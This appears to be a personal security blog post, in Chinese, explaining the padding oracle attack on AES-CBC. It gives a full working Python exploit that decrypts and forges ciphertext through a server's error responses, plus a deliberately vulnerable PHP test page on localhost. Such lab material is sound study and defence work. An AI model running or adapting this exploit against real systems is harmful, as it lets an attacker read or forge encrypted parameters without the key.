<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="Yiruma" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="代码是完成了，但还是有个小疑问（会在最后给出描述），问了好多师傅但都没回我，好尴尬-_-||更新:在Ben师傅的帮助下问题已经解决，解决方案和问题描述放在最后，代码也已经更新请放心食用~~">
<meta name="keywords">
<meta property="og:type" content="article">
<meta property="og:title" content="Padding Oracle Attack">
<meta property="og:url" content="https://someonesometimes.github.io/2017/09/04/Padding-Oracle-Attack/index.html">
<meta property="og:site_name" content="Yiruma">
<meta property="og:description" content="代码是完成了，但还是有个小疑问（会在最后给出描述），问了好多师傅但都没回我，好尴尬-_-||更新:在Ben师傅的帮助下问题已经解决，解决方案和问题描述放在最后，代码也已经更新请放心食用~~">
<meta property="og:updated_time" content="2017-11-19T05:53:38.989Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Padding Oracle Attack">
<meta name="twitter:description" content="代码是完成了，但还是有个小疑问（会在最后给出描述），问了好多师傅但都没回我，好尴尬-_-||更新:在Ben师傅的帮助下问题已经解决，解决方案和问题描述放在最后，代码也已经更新请放心食用~~">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://someonesometimes.github.io/2017/09/04/Padding-Oracle-Attack/"/>





  <title>Padding Oracle Attack | Yiruma</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  















  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Yiruma</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      
        
        <li class="menu-item menu-item-link">
          <a href="/link" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-link"></i> <br />
            
            友链
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://someonesometimes.github.io/2017/09/04/Padding-Oracle-Attack/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Yiruma">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Yiruma">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Padding Oracle Attack</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-09-04T20:29:19+08:00">
                2017-09-04
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>代码是完成了，但还是有个小疑问（会在最后给出描述），问了好多师傅但都没回我，好尴尬-_-||<br>更新:在Ben师傅的帮助下问题已经解决，解决方案和问题描述放在最后，代码也已经更新请放心食用~~</p>
<a id="more"></a>
<h2 id="首先描述应用场景"><a href="#首先描述应用场景" class="headerlink" title="首先描述应用场景"></a>首先描述应用场景</h2><p>有许多网站存在这样的功能：参数是经过对称加密算法加密过的，一般用aes的居多，然后传到服务端后先对参数进行解码，之后再去利用。这样有什么好处呢？基本就像是封死了这个参数点一样，因为我们没有密钥，所以也无法构造出有效的参数来（大多数都会在解密时发现错误而丢弃），而Padding Oracle Attack可以适用于这样一种情况：<br><strong>在服务端使用的分组加密模式为CBC+PKCS填充方案，并且在传入无法解密的cipherText值与传入可以解密的CipherText值具有两种不同的回显时，我们就可以通过这种攻击方式来计算得到密文对应的明文，同时也可以计算出明文所对应的密文</strong></p>
<h2 id="然后是重头戏，对Padding-Oracle-Attack的理解"><a href="#然后是重头戏，对Padding-Oracle-Attack的理解" class="headerlink" title="然后是重头戏，对Padding Oracle Attack的理解"></a>然后是重头戏，对Padding Oracle Attack的理解</h2><p>直接放上赵颉老师翻译的一篇博文<a href="http://blog.zhaojie.me/2010/10/padding-oracle-attack-in-detail.html" title="http://blog.zhaojie.me/2010/10/padding-oracle-attack-in-detail.html" target="_blank" rel="external">http://blog.zhaojie.me/2010/10/padding-oracle-attack-in-detail.html</a>，貌似大家都是从这篇文章接触的这种攻击方式</p>
<p>具体的攻击方式就不再详细阐述，看赵老师的博客就好，然后这里说一些要注意的点：</p>
<ul>
<li>赵老师的博文里面的讲解用的是DES，所以每个分块都是8个字节，而现在常见的都是aes也就是一块是16个字节的，自己改一下就好，下面给出的实现代码是AES的</li>
<li>其实这种攻击最根本上就是在求密文所对应的middle中间值，所用的函数像由密文求明文，由明文求密文实际上都是分块先把中间值求出来</li>
<li>Padding Oracle Attack是分块运行的，所以可以开多线程来求每个分组的中间值</li>
<li>其实我们是在遍历IV值来求middle中间值，所以只要IV值是可控的就可以，只有IV值可控而密文不可控下，是可以对一个分组进行加解密的</li>
</ul>
<h2 id="实现代码，尽可能的注释详细些"><a href="#实现代码，尽可能的注释详细些" class="headerlink" title="实现代码，尽可能的注释详细些"></a>实现代码，尽可能的注释详细些</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div><div class="line">147</div><div class="line">148</div><div class="line">149</div><div class="line">150</div><div class="line">151</div><div class="line">152</div><div class="line">153</div><div class="line">154</div><div class="line">155</div><div class="line">156</div><div class="line">157</div><div class="line">158</div><div class="line">159</div><div class="line">160</div><div class="line">161</div><div class="line">162</div><div class="line">163</div><div class="line">164</div><div class="line">165</div><div class="line">166</div><div class="line">167</div><div class="line">168</div><div class="line">169</div><div class="line">170</div><div class="line">171</div><div class="line">172</div><div class="line">173</div><div class="line">174</div><div class="line">175</div><div class="line">176</div><div class="line">177</div><div class="line">178</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#coding=utf-8</span></div><div class="line"><span class="keyword">import</span> requests</div><div class="line">N = <span class="number">16</span>      <span class="comment">#只有部分更改了过来，有些细节上还无意识的使用者32或16</span></div><div class="line">legth = N*<span class="number">2</span></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">hex_format</span><span class="params">(num,legth)</span>:</span></div><div class="line">    str = hex(num)[<span class="number">2</span>:]</div><div class="line">    <span class="keyword">if</span> str[len(str)<span class="number">-1</span>] == <span class="string">'L'</span>:</div><div class="line">        str = str[:<span class="number">-1</span>]</div><div class="line">    <span class="keyword">return</span> <span class="string">'0'</span>*(legth-len(str))+str</div><div class="line"></div><div class="line"></div><div class="line"><span class="comment">#这个是由使用者根据情况自定义的对回显界面的判断</span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">inject</span><span class="params">(s, iv, cipher)</span>:</span></div><div class="line"></div><div class="line">    <span class="comment"># print iv+cipher</span></div><div class="line">    url = <span class="string">'http://localhost/test1.php?id=&#123;&#125;'</span>.format(iv+cipher)</div><div class="line">    <span class="comment"># print url</span></div><div class="line">    retu = s.get(url)</div><div class="line">    <span class="comment"># print retu.content</span></div><div class="line">    <span class="keyword">if</span> retu.content == <span class="string">'hacker?'</span>:</div><div class="line">        <span class="keyword">return</span> <span class="keyword">False</span></div><div class="line">    <span class="keyword">if</span> retu.content == <span class="string">'1'</span>:</div><div class="line">        <span class="keyword">return</span> <span class="keyword">True</span></div><div class="line">    <span class="keyword">return</span> <span class="keyword">False</span></div><div class="line"></div><div class="line"><span class="comment">#输入cipher的str形式，可以得到mid值的str形式</span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_aes_mid</span><span class="params">(cipher)</span>:</span></div><div class="line"></div><div class="line">    <span class="function"><span class="keyword">def</span> <span class="title">get_list_to_str_</span><span class="params">(iv)</span>:</span></div><div class="line">        retu = <span class="string">""</span></div><div class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> iv:</div><div class="line">            retu += hex_format(i,<span class="number">2</span>)</div><div class="line">        <span class="keyword">return</span> retu</div><div class="line"></div><div class="line">    <span class="comment">#避免重复建立requests对象</span></div><div class="line">    s = requests.session()</div><div class="line"></div><div class="line">    <span class="comment">#主要就是对iv进行遍历，为了方便操作采用这种list的形式，元素为int型   同时建立输出参数mid_str</span></div><div class="line">    iv = [<span class="number">0</span> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">16</span>)]</div><div class="line">    mid_list = [<span class="number">0</span> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">16</span>)]</div><div class="line"></div><div class="line">    <span class="comment">#padding是每经过一轮都要变化的，因为每一轮都在爆破不同位</span></div><div class="line">    padding = <span class="number">0x01</span></div><div class="line"></div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">16</span>)[::<span class="number">-1</span>]:</div><div class="line">        find_tag = <span class="number">0</span></div><div class="line"></div><div class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">0x100</span>):  <span class="comment">#0x00 ~ 0xff</span></div><div class="line"></div><div class="line">            <span class="comment">#至此层，是对iv[i]进行遍历，然后生成一个iv_str用于发送出去</span></div><div class="line">            iv[i] = j</div><div class="line">            iv_str = get_list_to_str_(iv)</div><div class="line"></div><div class="line">            <span class="comment">#如果没有这一步的话，在填充为0x10*16的时候，服务器解析正确的时候返回空字符串，还有可能进入异常分支，所以这一步是很重要的</span></div><div class="line">            <span class="keyword">if</span> (i == <span class="number">0</span>):</div><div class="line">                retu = inject(s, <span class="string">"1"</span>*<span class="number">32</span>, iv_str+cipher)</div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                retu = inject(s, iv_str, cipher)</div><div class="line"></div><div class="line">            <span class="comment">#基于服务器的返回情况进行判断，成立可以跳出此循环，进行下一位的爆破</span></div><div class="line">            <span class="keyword">if</span> (retu):</div><div class="line">                <span class="comment">#如果成立的话，进行以下操作</span></div><div class="line">                <span class="comment">#   基于iv对应位的值以及padding的值生成mid值</span></div><div class="line">                <span class="comment">#   更新padding的填充方式，也就是加一</span></div><div class="line">                <span class="comment">#   对应修改iv位上的值，由修改后的padding与mid值得到</span></div><div class="line">                mid = iv[i]^padding</div><div class="line">                <span class="keyword">print</span> hex_format(mid, <span class="number">2</span>),</div><div class="line">                mid_list[i] = mid</div><div class="line">                padding += <span class="number">1</span></div><div class="line">                <span class="keyword">for</span> k <span class="keyword">in</span> range(i,<span class="number">16</span>):</div><div class="line">                    iv[k] = padding^mid_list[k]</div><div class="line">                find_tag = <span class="number">1</span></div><div class="line">                <span class="keyword">break</span></div><div class="line"></div><div class="line">        <span class="keyword">if</span> (find_tag == <span class="number">0</span>):</div><div class="line">            <span class="keyword">print</span></div><div class="line">            <span class="keyword">print</span> <span class="string">'在密文分组为&#123;&#125;的第&#123;&#125;个字节尝试了所有可能也没有发现匹配，请尝试分析'</span>.format(cipher, str(i))</div><div class="line">    mid_str = get_list_to_str_(mid_list)</div><div class="line"></div><div class="line">    <span class="keyword">return</span> mid_str</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">padding_oracle_get_cipher</span><span class="params">(plain)</span>:</span></div><div class="line">    <span class="string">"""</span></div><div class="line">    参数：明文字符串即可,\n \x0a是支持的，不支持0x0a  %0a,所以要注意转化</div><div class="line"></div><div class="line">    生成明文对应的密文的方式：</div><div class="line">        1、将明文转化为二进制格式并进行填充操作，并从最后一组开始</div><div class="line">        2、最后一组的操作为：传入任意密文得到mid值，并由明文得到iv值，作为下一组的密文</div><div class="line">        3、开始倒数第二组，将上一组的iv作为密文，得到mid值，然后由明文得到iv值，作为下一组的密文</div><div class="line">        4、。。。。</div><div class="line">        5、一直到最后一组，所解得的值作为IV值</div><div class="line">        6、将所有轮的结果连到一起构成cipher</div><div class="line"></div><div class="line">    返回：cipher</div><div class="line">    """</div><div class="line"></div><div class="line">    <span class="comment">#转化明文为二进制格式</span></div><div class="line">    plain = plain.encode(<span class="string">'hex'</span>)</div><div class="line"></div><div class="line">    <span class="comment">#对明文进行填充</span></div><div class="line">    <span class="keyword">if</span> (len(plain) % <span class="number">32</span> != <span class="number">0</span>):</div><div class="line">        temp = (<span class="number">32</span>-len(plain)%<span class="number">32</span>)/<span class="number">2</span></div><div class="line">        plain += hex_format(temp,<span class="number">2</span>)*temp</div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        plain += <span class="string">'10'</span>*<span class="number">16</span></div><div class="line"></div><div class="line">    <span class="comment">#将明文进行分组</span></div><div class="line">    plain_list = []</div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(len(plain))[::<span class="number">32</span>]:</div><div class="line">        plain_list.append(plain[i:i+<span class="number">32</span>])</div><div class="line">    <span class="keyword">print</span> <span class="string">"填充后的明文分组为:"</span> + str(plain_list)</div><div class="line"></div><div class="line">    <span class="comment">#循环求中间值,需要先指定最后一组密文,就由1组成吧</span></div><div class="line">    cipher_block = <span class="string">'1'</span>*<span class="number">32</span></div><div class="line">    cipher = <span class="string">""</span> + cipher_block</div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(len(plain_list))[::<span class="number">-1</span>]:</div><div class="line">        <span class="comment">#求到对应mid块</span></div><div class="line">        mid_block = get_aes_mid(cipher_block)</div><div class="line">        <span class="comment">#由mid与当前的plain块得到cipehr块并加进去，同时结果作为下一组求mid的参数</span></div><div class="line">        cipher_block = hex_format(int(mid_block,<span class="number">16</span>) ^ int(plain_list[i],<span class="number">16</span>), <span class="number">32</span>)</div><div class="line">        <span class="keyword">print</span></div><div class="line">        <span class="keyword">print</span> <span class="string">'plain_list:'</span> + plain_list[i]</div><div class="line">        <span class="keyword">print</span> <span class="string">'mid_block:'</span>+mid_block</div><div class="line">        <span class="keyword">print</span> <span class="string">'iv:'</span>+cipher_block</div><div class="line">        cipher = cipher_block + cipher</div><div class="line"></div><div class="line">    <span class="keyword">return</span> cipher</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">padding_oracle_get_plain</span><span class="params">(cipher)</span>:</span></div><div class="line">    <span class="string">"""</span></div><div class="line">    参数：IV+cipher</div><div class="line"></div><div class="line">    解密密文对应明文方法：</div><div class="line">        1、将IV与cipher连到一起，并分割成list的形式</div><div class="line">        2、从列表的第二组开始，操作为，传入对应的cipher块得到对应的mid值，并由index-1对应的块异或得到明文值</div><div class="line">        3、。。。。</div><div class="line">        4、一直到最后一组，所解得的值作为明文连起来构成明文</div><div class="line"></div><div class="line">    返回：明文对应的十六进制以及解出的明文</div><div class="line">    """</div><div class="line"></div><div class="line">    cipher_list = []</div><div class="line"></div><div class="line">    <span class="comment">#对cipher进行长度检查并切片处理，</span></div><div class="line">    <span class="keyword">if</span>(len(cipher)%<span class="number">32</span> != <span class="number">0</span>):</div><div class="line">        <span class="keyword">print</span> <span class="string">'长度不是32的倍数'</span></div><div class="line">        <span class="keyword">return</span></div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(len(cipher))[::<span class="number">32</span>]:</div><div class="line">        cipher_list.append(cipher[i:i+<span class="number">32</span>])</div><div class="line">    <span class="keyword">print</span> <span class="string">"待解密的两个密文分组: "</span> + str(cipher_list[<span class="number">1</span>:])</div><div class="line"></div><div class="line">    plain = <span class="string">""</span></div><div class="line"></div><div class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(len(cipher_list))[<span class="number">1</span>:]:</div><div class="line">        mid_block = get_aes_mid(cipher_list[i])</div><div class="line">        plain_block = hex_format(int(mid_block,<span class="number">16</span>) ^ int(cipher_list[i<span class="number">-1</span>],<span class="number">16</span>), <span class="number">32</span>)</div><div class="line">        plain += plain_block</div><div class="line">        <span class="keyword">print</span></div><div class="line">        <span class="keyword">print</span> <span class="string">'plain_block:'</span>+ plain_block + <span class="string">' --&gt; '</span> + plain_block.decode(<span class="string">'hex'</span>)</div><div class="line">        <span class="keyword">print</span> <span class="string">'mid_block:'</span>+mid_block</div><div class="line">        <span class="keyword">print</span> <span class="string">'cipher_block:'</span>+cipher_list[i]</div><div class="line"></div><div class="line">    <span class="comment">#去除明文最后的填充位</span></div><div class="line">    plain_bin_len = len(plain)-int(plain[<span class="number">-2</span>:],<span class="number">16</span>)*<span class="number">2</span></div><div class="line">    plain = plain[:plain_bin_len]</div><div class="line"></div><div class="line">    <span class="keyword">return</span> plain, plain.decode(<span class="string">'hex'</span>)</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">print</span> padding_oracle_get_cipher(<span class="string">'x23'</span>)</div><div class="line"><span class="comment"># print padding_oracle_get_plain('3131313131313131313131313131313148345eb08722cda708607c96534117049976f1681a00afdaa18c7e42d181887c')</span></div></pre></td></tr></table></figure>
<h2 id="搭建测试环境"><a href="#搭建测试环境" class="headerlink" title="搭建测试环境"></a>搭建测试环境</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'id'</span>]) &amp;&amp; $_GET[<span class="string">'id'</span>] != <span class="string">""</span>)&#123;</div><div class="line">    $iv = substr($_GET[<span class="string">'id'</span>], <span class="number">0</span>, <span class="number">32</span>);</div><div class="line">    $iv = pack(<span class="string">'H*'</span>, $iv);</div><div class="line">    $cipher = substr($_GET[<span class="string">'id'</span>], <span class="number">32</span>);</div><div class="line">    $cipher = pack(<span class="string">'H*'</span>,$cipher);</div><div class="line">  <span class="comment">//需要注意php里面加解密模块的参数格式： $cipher与$iv都是以字符串输入的，而不是十六进制形式的字符串，所以上面我需要将传入的参数进行十六进制解码变成相应的字符串</span></div><div class="line">    $retu = openssl_decrypt($cipher, <span class="string">'aes-128-cbc'</span>,</div><div class="line">        hash(<span class="string">'md5'</span>, <span class="string">'Yiruma'</span>, <span class="keyword">true</span>), OPENSSL_RAW_DATA, $iv);</div><div class="line"></div><div class="line">    <span class="keyword">if</span> ($retu) &#123;</div><div class="line">        <span class="keyword">echo</span> <span class="string">'1'</span>;</div><div class="line">    &#125;<span class="keyword">else</span>&#123;</div><div class="line">        <span class="keyword">echo</span> <span class="string">'hacker?'</span>;</div><div class="line">    &#125;</div><div class="line"></div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<h2 id="一点疑惑"><a href="#一点疑惑" class="headerlink" title="一点疑惑"></a>一点疑惑</h2><p>如果仔细看了赵老师的博客后都知道我们每个字节的测试都是基于解到的plain是否满足最后为0x01  0x020x02 0x030x030x03这种形式，但是在我们测试每一个分组的第一个字节的时候会出现什么情况？？期望的填充位没有问题肯定是<code>&quot;0x10&quot;*16</code>，所以我们希望服务器在解到10101010101010101010101010101010的时候给我们回显，但是这时候服务器解密出来的<code>&quot;0x10&quot;*16</code>所对应的字符串是””<br>OK，那我们可以考虑下，如果服务端是这样写的呢？if($retu){echo ‘1’}else{echo ‘hacker?’},那么这个时候空字符串就会对应回显’hacker?’,这并不是我们想看到的，因为如果唯一能被aes正常解密的一次猜测都对应这样的回显的话，那对这个字节的256次尝试将不会看到一次对应为1的回显。也就是说最后一个字节将无法求得。<br>有没有大佬能给出解释呢，是需要在Padding Oracle Attack的代码上要有所改进吗？</p>
<p>在Ben师傅帮助下已经解决：<br>其实也蛮简单，在测试这一位的时候我们往服务器传送两个分组，这样一个分组全填充也就是填充为<code>&quot;0x10*16&quot;</code>的时候解密出来的字符串并不是””，因为还有前面一个分组，所以就不会出现上述的问题了。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/09/19/XSS前端防御———对WHCTF中XSS题目filter-js的分析/" rel="next" title="XSS前端防御———对WHCTF中xss题目filter.js的分析">
                <i class="fa fa-chevron-left"></i> XSS前端防御———对WHCTF中xss题目filter.js的分析
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/08/31/OAuth授权流程学习以及Turning-Self-XSS-into-Good-XSS/" rel="prev" title="OAuth授权流程学习以及Turning Self-XSS into Good-XSS">
                OAuth授权流程学习以及Turning Self-XSS into Good-XSS <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8zMTE1OS83NzA4"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="Yiruma" />
          <p class="site-author-name" itemprop="name">Yiruma</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">25</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#首先描述应用场景"><span class="nav-number">1.</span> <span class="nav-text">首先描述应用场景</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#然后是重头戏，对Padding-Oracle-Attack的理解"><span class="nav-number">2.</span> <span class="nav-text">然后是重头戏，对Padding Oracle Attack的理解</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#实现代码，尽可能的注释详细些"><span class="nav-number">3.</span> <span class="nav-text">实现代码，尽可能的注释详细些</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#搭建测试环境"><span class="nav-number">4.</span> <span class="nav-text">搭建测试环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#一点疑惑"><span class="nav-number">5.</span> <span class="nav-text">一点疑惑</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yiruma</span>
  <span id="busuanzi_container_site_pv">
    本站总访问量<span id="busuanzi_value_site_pv"></span>次
</span>
<span id="busuanzi_container_site_uv">
  本站访客数<span id="busuanzi_value_site_uv"></span>人次
</span>
</div>


<div class="powered-by">
